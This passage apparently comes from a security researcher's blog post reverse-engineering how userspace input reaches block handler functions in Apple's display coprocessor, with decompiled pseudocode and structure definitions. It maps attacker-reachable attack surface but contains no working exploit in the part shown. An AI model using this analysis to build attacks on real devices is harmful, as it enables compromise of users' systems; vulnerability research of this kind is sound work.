\n\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-Z34Qgm9fUE2rzMwJWQ3j-w7InvtfHj5fs2qctSh0tTFmMbUpnrsQC4rUrhMf3_83uHAFinlM6xKqKXgUc2QR5IfL0gf4YEBM9Rqgrc6sNYsaCZ-JAe0PHlGa9VYcBgWfTqj5rTtin1mWTDG-I8K5M41EhA64KLNV54Sv9lvtbYIrkY2j37X6SniB/s1436/Screenshot%202022-06-22%20at%2016.53.47.png>)\n\nYou can perhaps see where this is going: that's looking like really quite a lot of reachable attack surface! Each of those setBlock_Impl functions is reachable by passing a different value for the first scalar argument to IOConnectCallMethod 78.\n\n \n\n\nThere's a little bit more reversing though to figure out how exactly to get controlled bytes to those setBlock_Impl functions:\n\n## Memory Mapping\n\nThe raw \"block\" input to each of those setBlock_Impl methods isn't passed inline in the IOConnectCallMethod structure input. There's another level of indirection: each individual block handler structure has an array of supported \"subtypes\" which contains metadata detailing where to find the (userspace) pointer to that subtype's input data in the IOConnectCallMethod structure input. The first dword in the structure input is the id of this subtype - in this case for the block handler type 19 the metadata array has a single entry:\n\n \n\n\n&lt;2, 0, 0x5F8, 0x600&gt;\n\n \n\n\nThe first value (2) is the subtype id and 0x5f8 and 0x600 tell the DCP from what offset in the structure input data to read a pointer and size from. The DCP then requests a memory mapping from the AP for that memory from the calling task:\n\n \n\n\nreturn wrap_MemoryDescriptor::withAddressRange(\n\n*(void*)(structure_input_buffer + addr_offset),\n\n*(unsigned int *)(structure_input_buffer + size_offset),\n\ncaller_task_ptr); \n \n--- \n \n \n\n\nWe saw earlier that the AP sends the DCP the struct task pointer of the calling task; when the DCP requests a memory mapping from a user task it sends those raw task struct pointers back to the AP such that the kernel can perform the mapping from the correct task. The memory mapping is abstracted as an MDES object on the DCP side; the implementation of the mapping involves the DCP making an RPC to the AP:\n\n \n\n\nmake_link_call('D453', &amp;req, 0x20, &amp;resp, 0x14); \n \n--- \n \n \n\n\nwhich corresponds to a call to this method on the AP side:\n\n \n\n\nIOMFB::MemDescRelay::withAddressRange(unsigned long long, unsigned long long, unsigned int, task*, unsigned long*, unsigned long long*) \n \n--- \n \n \n\n\nThe DCP calls ::prepare and ::map on the returned MDES object (exactly like an IOMemoryDescriptor object in IOKit), gets the mapped pointer and size to pass via a few final levels of indirection to the block handler:\n\n \n\n\na_descriptor_with_controlled_stuff-&gt;dispatcher_fptr(\n\na_descriptor_with_controlled_stuff,\n\nblock_type_handler,\n\nimportant_ptr,\n\nimportant_size); \n \n--- \n \n \n\n\nwhere the dispatcher_fptr looks like this:\n\n \n\n\na_dispatcher(\n\nstruct metadispatcher *disp,\n\nstruct BlockHandler *block_handler,\n\n__int64 controlled_ptr,\n\nunsigned int controlled_size)\n\n{\n\nreturn block_handler-&gt;BlockHandler_setBlock(\n\nblock_handler,\n\ndisp-&gt;structure_input_buffer,\n\ndisp-&gt;structure_input_size,\n\ndisp-&gt;remaining_scalar_inputs,\n\ndisp-&gt;cnt_remaining_sclar_input,\n\ndisp-&gt;handlers_holder-&gt;gate,\n\ncontrolled_ptr,\n\ncontrolled_size);\n\n} \n \n--- \n \n \n\n\nYou can see here just how useful it is to keep making structure definitions while reversing; there are so many levels of indirection that it's pretty much impossible to keep it all in your head.\n\n \n\n\nBlockHandler_setBlock is a virtual method on BLHA. This is the implementation for BLHA 19:\n\n \n\n\nBlockHandler19::setBlock(\n\nstruct BlockHandler *this,\n\nvoid *structure_input_buffer,\n\nint64 structure_input_size,\n\nint64 *remaining_scalar_inputs,\n\nunsigned int cnt_remaining_scalar_inputs,\n\nstruct CommandGate *gate,\n\nvoid* mapped_mdesc_ptr,\n\nunsigned int mapped_mdesc_length) \n \n--- \n \n \n\n\nThis uses a Command Gate (GATI) object (like a call gate in IOKit to serialise calls) to finally get close to actually calling the setBlock_Impl function.\n\n \n\n\nWe need to reverse the gate_context structure to follow the controlled data through the gate:\n\n \n\n\nstruct __attribute__((aligned(8))) gate_context\n\n{\n\nstruct BlockHandler *the_target_this;\n\nuint64_t structure_input_buffer;\n\nvoid *remaining_scalar_inputs;\n\nuint32_t cnt_remaining_scalar_inputs;\n\nuin